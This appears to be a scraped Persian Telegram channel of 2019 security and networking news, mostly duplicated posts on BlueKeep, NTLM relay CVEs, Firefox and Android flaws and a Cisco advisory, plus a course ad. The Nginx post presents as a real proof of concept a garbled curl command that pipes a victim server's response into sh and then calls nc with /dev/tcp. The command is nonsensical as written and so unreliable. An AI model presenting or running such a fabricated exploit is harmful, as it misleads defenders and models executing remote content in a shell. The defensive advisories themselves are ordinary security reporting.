انتشار وصله امنیتی مهم ( مایکروسافت ) !!!
انتشار وصلهیهای امنیتی رایگان remote desktop مایکروسافت برای نسخههای قدیمی ویندوز جهت جلوگیری از بروز مجدد حملات WannaCry
مایکروسافت در بهروزرسانی ماه می سال 2019 خود، 79 آسیبپذیری از جمله یک آسیبپذیری در سیستمعاملهای قدیمی Windows XP و Server 2003 که دیگر از آنها پشتیبانی نمیکند را وصله کرده است
انتشار وصلهیهای امنیتی رایگان remote desktop مایکروسافت برای نسخههای قدیمی ویندوز جهت جلوگیری از بروز مجدد حملات WannaCry
مایکروسافت در بهروزرسانی ماه می سال 2019 خود، 79 آسیبپذیری از جمله یک آسیبپذیری در سیستمعاملهای قدیمی Windows XP و Server 2003 که دیگر از آنها پشتیبانی نمیکند را وصله کرده است
🔺آسیبپذیری بحرانی در وبسرور Nginx
وبسرور Nginx در هستهی خود از یک زبان اسکریپتی با نام Njs پشتیبانی میکند که به کاربران اجازهی گسترش کارکرد nginx (مثل دستکاری سرآیندهای پاسخ و کنترل دسترسیهای یک درخواست HTTP قبل از اینکه به سرور بالادستی برسد) را میدهد. به نظر میرسد در ساختار این زبان، باگهای خطرناکی همچون Integer Overflow وجود دارد که تخریب حافظه Heap را در بر میدارد. این تهدید به مهاجمین امکان توسعهی اکسپلویت و دسترسی از راه دور را فراهم میآورد. پیشنهاد موکد میشود که در اسرع وقت نسبت به بهروزرسانی، اقدامات لازم انجام شود.
اثبات مفهومی از این آسیبپذیری منتشر شده که نیازمند تست است:
curl -gsS https://<VICTIMSERVER>:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
وبسرور Nginx در هستهی خود از یک زبان اسکریپتی با نام Njs پشتیبانی میکند که به کاربران اجازهی گسترش کارکرد nginx (مثل دستکاری سرآیندهای پاسخ و کنترل دسترسیهای یک درخواست HTTP قبل از اینکه به سرور بالادستی برسد) را میدهد. به نظر میرسد در ساختار این زبان، باگهای خطرناکی همچون Integer Overflow وجود دارد که تخریب حافظه Heap را در بر میدارد. این تهدید به مهاجمین امکان توسعهی اکسپلویت و دسترسی از راه دور را فراهم میآورد. پیشنهاد موکد میشود که در اسرع وقت نسبت به بهروزرسانی، اقدامات لازم انجام شود.
اثبات مفهومی از این آسیبپذیری منتشر شده که نیازمند تست است:
curl -gsS https://<VICTIMSERVER>:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Forwarded from Honaroweb
شروع دوره نیمه خصوصی طراحی وب و مدیریت محتوا پنل وردپرس (فروشگاهی،تجاری، شخصی) طراحی حرفه ای پنل و قالب مشابه دیجی کالا و دیوار همچنین هدیه قالب حرفه ای طراحی شده به کاراموزان دوره تابستان همچنین مناسب افرادی که دارای کسب و کار شخصی هستند و نیاز به مدیریت محتوا بدون هیچ پشتیبانی را دارند. جهت هماهنگی و اطلاع ثبت نام با شماره زیر تماس حاصل فرمایید:
مهلت ثبت نام تا ۳۰خرداد
شروع دوره ۵تیر
هزینه دوره:۵۵۰ت با محاسبه تخفیف ۳۰درصدی مدت زمان دوره:۳۰ساعت
با ارائه مدرک معتبر
جهت مشاوره و ثبت نام:
۰۲۱۶۶۹۴۸۳۹۵
#طراحی_وب#وردپرس_مقدماتی_تا_پیشرفته
مهلت ثبت نام تا ۳۰خرداد
شروع دوره ۵تیر
هزینه دوره:۵۵۰ت با محاسبه تخفیف ۳۰درصدی مدت زمان دوره:۳۰ساعت
با ارائه مدرک معتبر
جهت مشاوره و ثبت نام:
۰۲۱۶۶۹۴۸۳۹۵
#طراحی_وب#وردپرس_مقدماتی_تا_پیشرفته
آخرین بروزرسانی از BGP AS های ایران به همراه آمار تعداد روتها و همسایگی های آی پی نسخه ۴ و ۶
#BGP
#AS
#Adjacencies
کانال آموزش شبکه
🆔 @futuresnet
#BGP
#AS
#Adjacencies
کانال آموزش شبکه
🆔 @futuresnet
خبر آموزشی بسیار مهم !!!
شرکت سیسکو دقایقی پیش رسما اعلام کرد کلیه آزمون های سری CCNA , CCNP در تمامی گرایش ها در تاریخ ۲۳ فوریه ۲۰۲۰ بروز رسانی خواهد شد .
دوستانی که با شرایط فعلی میخواهند در دوره های مرتبط شرکت و آزمون خود را به پایان برسانند ، عجله کنند .
( روی یک ماه آخر زمان باقی مانده برای مراجعه به مراکز رسمی آزمون بین المللی خیلی حساب نکنید !!! )
@futuresnet
شرکت سیسکو دقایقی پیش رسما اعلام کرد کلیه آزمون های سری CCNA , CCNP در تمامی گرایش ها در تاریخ ۲۳ فوریه ۲۰۲۰ بروز رسانی خواهد شد .
دوستانی که با شرایط فعلی میخواهند در دوره های مرتبط شرکت و آزمون خود را به پایان برسانند ، عجله کنند .
( روی یک ماه آخر زمان باقی مانده برای مراجعه به مراکز رسمی آزمون بین المللی خیلی حساب نکنید !!! )
@futuresnet
🔺 لزوم توجه به دو آسیب پذیری (دور خوردن احراز هویت) مایکروسافت توسط تیم های امنیت سازمانها
یکی از آسیب پذیری هایی که اخیرا توسط مهاجمین در حملات مختلف مورد استفاده قرار گرفته تحت شناسه CVE-2019-1040 و CVE-219-1019 شناخته می شه که مهاجم رو قادر می کنه که یا کدمخرب خودش رو از راه دور و بر روی هر پلت فرم ویندوزی اجرا کنه و یا به هر وب سروری که از WIA ( Windows Integrated Authentication ) پشتیبانی می کنه بتونه بصورت کامل فرایند احرازهویت رو انجام بده و دور بزنه. (برای مثال سرویس Exchange و ADFS از این قابلیت پشتیبانی می کنند)
بر طبق جزئیات منتشر شده این دو CVE از سه ضعف منطقی در NTLM ناشی می شود و با سواستفاده موفق از این آسیب پذیری می توان اعمالی نظیر خواندن تمامی ایمیل های کاربران، انجام فرایند احرازهویت بر روی هر منبع ابری که بوسیله ADFS کنترل می شود و یا اجرای کدمخرب بر روی سیستم قربانی به منظور تغییر بر روی پیکربندی شبکه به منظور ایجاد یک درب پیشتی را انجام داد.
لازم به یادآوری هست که NTLM نسبت به حملات Relay بسیار مستعد است و همین امر مهاجم را قادر می سازد که فرایند احرازهویت را ضبط کرده و آن را بر روی سرور دیگری به منظور انجام عملیات های مختلف با استفاده از امتیازات کاربر تایید شده، Relay کند. این حمله از حملات مرسومی است که علیه سرویس های Active Directory انجام می شود.
برای اطلاعات بیشتر می توانید به لینک های CVE-2019-1040 و CVE-2019-1019 مراجعه کنید
یکی از آسیب پذیری هایی که اخیرا توسط مهاجمین در حملات مختلف مورد استفاده قرار گرفته تحت شناسه CVE-2019-1040 و CVE-219-1019 شناخته می شه که مهاجم رو قادر می کنه که یا کدمخرب خودش رو از راه دور و بر روی هر پلت فرم ویندوزی اجرا کنه و یا به هر وب سروری که از WIA ( Windows Integrated Authentication ) پشتیبانی می کنه بتونه بصورت کامل فرایند احرازهویت رو انجام بده و دور بزنه. (برای مثال سرویس Exchange و ADFS از این قابلیت پشتیبانی می کنند)
بر طبق جزئیات منتشر شده این دو CVE از سه ضعف منطقی در NTLM ناشی می شود و با سواستفاده موفق از این آسیب پذیری می توان اعمالی نظیر خواندن تمامی ایمیل های کاربران، انجام فرایند احرازهویت بر روی هر منبع ابری که بوسیله ADFS کنترل می شود و یا اجرای کدمخرب بر روی سیستم قربانی به منظور تغییر بر روی پیکربندی شبکه به منظور ایجاد یک درب پیشتی را انجام داد.
لازم به یادآوری هست که NTLM نسبت به حملات Relay بسیار مستعد است و همین امر مهاجم را قادر می سازد که فرایند احرازهویت را ضبط کرده و آن را بر روی سرور دیگری به منظور انجام عملیات های مختلف با استفاده از امتیازات کاربر تایید شده، Relay کند. این حمله از حملات مرسومی است که علیه سرویس های Active Directory انجام می شود.
برای اطلاعات بیشتر می توانید به لینک های CVE-2019-1040 و CVE-2019-1019 مراجعه کنید
تلگرام امروز اعلام کرد، سرورهایش زیر حملات شدید DDoS میباشد و ممکن است کاربران آمریکا و برخی دیگر از کشورها با اختلالاتی مواجه شوند
@futuresnet
@futuresnet
🔺فایرفاکس رو همین الان آپدیت کنید!
این هفته ۲ آسیبپذیری بحرانی از فایرفاکس درومده که با تلفیق همدیگه برای مهاجم اجرای کدهای مخرب از راه دور رو فراهم میکنه که یکیش با شناسه CVE-2019-11708 در واقع یه جور گریز از مکانیزم امنیتی (سندباکس) این مرورگره و یکی دیگهش CVE-2019-11707 نقص در آبجکت تایپ (Type Confusion) هست.
لزوم هشدار برای آپدیت از اینجا نشات میگیره که به نظر میاد عدهای خواستن از این آسیبپذیریها که اکسپلویتش منتشر نشده کارمندان یه نهاد رمزارز به اسم Coinbase رو بزنن. بنابراین بصورت زیرزمینی اکسپلویتش ممکنه فراگیر و خطرناک باشه. پس سریعتر حواستون به بهروزرسانی باشه.
این هفته ۲ آسیبپذیری بحرانی از فایرفاکس درومده که با تلفیق همدیگه برای مهاجم اجرای کدهای مخرب از راه دور رو فراهم میکنه که یکیش با شناسه CVE-2019-11708 در واقع یه جور گریز از مکانیزم امنیتی (سندباکس) این مرورگره و یکی دیگهش CVE-2019-11707 نقص در آبجکت تایپ (Type Confusion) هست.
لزوم هشدار برای آپدیت از اینجا نشات میگیره که به نظر میاد عدهای خواستن از این آسیبپذیریها که اکسپلویتش منتشر نشده کارمندان یه نهاد رمزارز به اسم Coinbase رو بزنن. بنابراین بصورت زیرزمینی اکسپلویتش ممکنه فراگیر و خطرناک باشه. پس سریعتر حواستون به بهروزرسانی باشه.
هشدار سایبری !!!
به گزارش مرکز امنیت زیرساختهای سایبری ایالات متحده ( CISA ) یک تهدید مهم امنیتی در سیستم های عامل زیر بانام BlueKeep شناسایی شده است .
Windows 2000
Windows Vista
Windows XP
Windows 7
Windows Server 2003
Windows Server 2003 R2
Windows Server 2008
Windows Server 2008 R2
برای سیستم های عامل 32و 64 بیتی
بعد از اجرایی شدن این تهدید کنترل کامل سیستم به دست مهاجم خواهد بود.
کانال اصلی نفوذ پروتکل RDP میباشد.
شماره CVE عبارتست از (CVE-2019-0708) . بعد از اجرای این حمله امکان اجرای انواع کدها از راه دور وجود دارد .
روشهای مقابله
1- نصب آخرین Patch های امنیتی منتشر شده بوسیله شرکت مایکروسافت
2- نصب Upgrade end-of-life (EOL) OSs
3- غیر فعال سازی کلیه سرویس های غیر ضروری
4- فعال سازی Network Level Authentication
5- مسدود سازی پورت 3389 TCP روی فایروال شبکه
زمان شناسایی June 17, 2019
هشدار کاملا جدی است !!!
به گزارش مرکز امنیت زیرساختهای سایبری ایالات متحده ( CISA ) یک تهدید مهم امنیتی در سیستم های عامل زیر بانام BlueKeep شناسایی شده است .
Windows 2000
Windows Vista
Windows XP
Windows 7
Windows Server 2003
Windows Server 2003 R2
Windows Server 2008
Windows Server 2008 R2
برای سیستم های عامل 32و 64 بیتی
بعد از اجرایی شدن این تهدید کنترل کامل سیستم به دست مهاجم خواهد بود.
کانال اصلی نفوذ پروتکل RDP میباشد.
شماره CVE عبارتست از (CVE-2019-0708) . بعد از اجرای این حمله امکان اجرای انواع کدها از راه دور وجود دارد .
روشهای مقابله
1- نصب آخرین Patch های امنیتی منتشر شده بوسیله شرکت مایکروسافت
2- نصب Upgrade end-of-life (EOL) OSs
3- غیر فعال سازی کلیه سرویس های غیر ضروری
4- فعال سازی Network Level Authentication
5- مسدود سازی پورت 3389 TCP روی فایروال شبکه
زمان شناسایی June 17, 2019
هشدار کاملا جدی است !!!
🔺خطرجدی برای مراکز داده سازمان ها!
اگه از یک زیرساختی که سوییچ سری 9000 سیسکو دارند دسترسی دارید و نیاز دارید به VLAN مدیریتی دسترسی پیدا کنید، بدونید که روی این سری سوییچ ها یک آسیب پذیری اومده که مهاجم میتونه بصورت غیرمجاز به VLAN ها دسترسی پیدا کنه.
گویا مهاجم از طریق ارسال یک بسته مخربLLDP به زیرشبکه مجاور از طریق این سری از سوییچ های سیسکو (در حالت ACI) میتونه بصورت غیرمجاز به VLAN های دیگه دسترسی پیدا کنه.
اگه حالت strict روی سوییچ پیکربندی شده باشه، مهاجم نمیتونه از این آسیبپذیری سواستفاده کنه. دلیلش هم برمیگرده به چک امنیتی ای که توسط firmware قبل از برقراری ارتباط انجام میشه. این بررسی های امنیتی هم شامل سه مورد زیره:
⭕️ فقط سوییچ هایی که سریال نامبر قانونی و ارتباط امن دارن، مجازن.
⭕️ فرایند تایید دسترسی بر مبنای شماره سریال انجام میشه.
⭕️ نیازمند به دسترسی و پیکربندی مدیر شبکه به منظور تایید دسترسی کنترلر و سوییچ ها به منظور برقراری اتصال هستن.
برای اطلاعات بیشتر میتونید به این لینک مراجعه کنید.
source news:offsec group
اگه از یک زیرساختی که سوییچ سری 9000 سیسکو دارند دسترسی دارید و نیاز دارید به VLAN مدیریتی دسترسی پیدا کنید، بدونید که روی این سری سوییچ ها یک آسیب پذیری اومده که مهاجم میتونه بصورت غیرمجاز به VLAN ها دسترسی پیدا کنه.
گویا مهاجم از طریق ارسال یک بسته مخربLLDP به زیرشبکه مجاور از طریق این سری از سوییچ های سیسکو (در حالت ACI) میتونه بصورت غیرمجاز به VLAN های دیگه دسترسی پیدا کنه.
اگه حالت strict روی سوییچ پیکربندی شده باشه، مهاجم نمیتونه از این آسیبپذیری سواستفاده کنه. دلیلش هم برمیگرده به چک امنیتی ای که توسط firmware قبل از برقراری ارتباط انجام میشه. این بررسی های امنیتی هم شامل سه مورد زیره:
⭕️ فقط سوییچ هایی که سریال نامبر قانونی و ارتباط امن دارن، مجازن.
⭕️ فرایند تایید دسترسی بر مبنای شماره سریال انجام میشه.
⭕️ نیازمند به دسترسی و پیکربندی مدیر شبکه به منظور تایید دسترسی کنترلر و سوییچ ها به منظور برقراری اتصال هستن.
برای اطلاعات بیشتر میتونید به این لینک مراجعه کنید.
source news:offsec group
Cisco
Cisco Security Advisory: Cisco Nexus 9000 Series Fabric Switches ACI Mode Fabric Infrastructure VLAN Unauthorized Access Vulnerability
A vulnerability in the fabric infrastructure VLAN connection establishment of the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an unauthenticated, adjacent attacker to bypass security validations and connect…
ابزار قدرتمند Aria2 برای دانلود از طریق ترمینال لینوکس
اپلیکیشن Aria2 یک ابزار دانلود در خط فرمان، چند منظوره، رایگان و سبک برای سرورهای لینوکس، ویندوز و مک میباشد که قادر به دانلود فایل ها از پروتکل ها و منابع مختلفی مانند HTTP/HTTPS، FTP، BitTorrent و Metalink میباشد. این ابزار سرعت دانلود را بوسیله استفاده از حداکثر پهنای باند بهبود میبخشد و باعث می شود شما یک دانلود با سرعت بالا را تجربه کنید.
ادامه مطلب:
http://linux-zone.org/forums/%D8%A7%D9%86%D8%AC%D9%85%D9%86-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3-linux-forum/%D8%AA%D9%88%D8%B2%DB%8C%D8%B9-%D9%87%D8%A7%DB%8C-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3-linux-distributions/general-linux/26597-aria2-%DB%8C%DA%A9-%D8%A7%D8%A8%D8%B2%D8%A7%D8%B1-%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%AF%D8%B1-%D8%AA%D8%B1%D9%85%DB%8C%D9%86%D8%A7%D9%84-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3
اپلیکیشن Aria2 یک ابزار دانلود در خط فرمان، چند منظوره، رایگان و سبک برای سرورهای لینوکس، ویندوز و مک میباشد که قادر به دانلود فایل ها از پروتکل ها و منابع مختلفی مانند HTTP/HTTPS، FTP، BitTorrent و Metalink میباشد. این ابزار سرعت دانلود را بوسیله استفاده از حداکثر پهنای باند بهبود میبخشد و باعث می شود شما یک دانلود با سرعت بالا را تجربه کنید.
ادامه مطلب:
http://linux-zone.org/forums/%D8%A7%D9%86%D8%AC%D9%85%D9%86-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3-linux-forum/%D8%AA%D9%88%D8%B2%DB%8C%D8%B9-%D9%87%D8%A7%DB%8C-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3-linux-distributions/general-linux/26597-aria2-%DB%8C%DA%A9-%D8%A7%D8%A8%D8%B2%D8%A7%D8%B1-%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%AF%D8%B1-%D8%AA%D8%B1%D9%85%DB%8C%D9%86%D8%A7%D9%84-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3
linux-zone.org
Aria2 - یک ابزار دانلود در ترمینال لینوکس -
انجمن آموزشی لینوکس و ویپ
انجمن آموزشی لینوکس و ویپ
Aria2 یک ابزار دانلود در خط فرمان، چند منظوره، رایگان و سبک برای سرورهای لینوکس (http://linux-zone.org/forums/%D8%A7%D9%86%D8%AC%D9%85%D9%86-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3-linux-forum/%D8%AA%D8%A7%D8%B2%D9%87-%D9%88%D8%A7%D8%B1%D8%AF%DB%8C%D9%86
گوگل در تازهترین تغییرات کروم، امکانی گذاشته که به کاربران URL های مشابه رو که معمولا برای فیشینگ بکار میرن، هشدار میده.
@futuresnet
@futuresnet
🔺خطرناک: اجرای کدهای مخرب از راه دور روی اندروید ۷، ۸ و ۹ (Nougat, Oero, Pie) تنها با تماشای یک فایل تصویری
کد اثبات آسیبپذیریای منتشر شده که به مهاجم قابلیت دسترسی از راه دور و اجرای کدهای مخرب را برروی آخرین نسخههای اندروید فراهم میکند. سازوکار این حمله از طریق فایلهای تصویریایست که دستکاری شدهاند. نکتهی قابل توجه این است که این فایلهای تصویری مخرب، اگر از طریق پلتفرمهایی مثل یوتیوب، واتساپ و برخی پیامرسانها برای قربانی ارسال شود بدلیل تغییر این پلتفرمها در محتوای فایلها ممکن است حمله انجام نشود، بنابراین مهاجم فایل را بصورت دستنخورده برای قربانی ارسال مینماید.
حتما نسبت به بهروزرسانی دستگاههای اندرویدی خود اقدام نمایید.
@futuresnet
https://github.com/marcinguy/CVE-2019-2107
کد اثبات آسیبپذیریای منتشر شده که به مهاجم قابلیت دسترسی از راه دور و اجرای کدهای مخرب را برروی آخرین نسخههای اندروید فراهم میکند. سازوکار این حمله از طریق فایلهای تصویریایست که دستکاری شدهاند. نکتهی قابل توجه این است که این فایلهای تصویری مخرب، اگر از طریق پلتفرمهایی مثل یوتیوب، واتساپ و برخی پیامرسانها برای قربانی ارسال شود بدلیل تغییر این پلتفرمها در محتوای فایلها ممکن است حمله انجام نشود، بنابراین مهاجم فایل را بصورت دستنخورده برای قربانی ارسال مینماید.
حتما نسبت به بهروزرسانی دستگاههای اندرویدی خود اقدام نمایید.
@futuresnet
https://github.com/marcinguy/CVE-2019-2107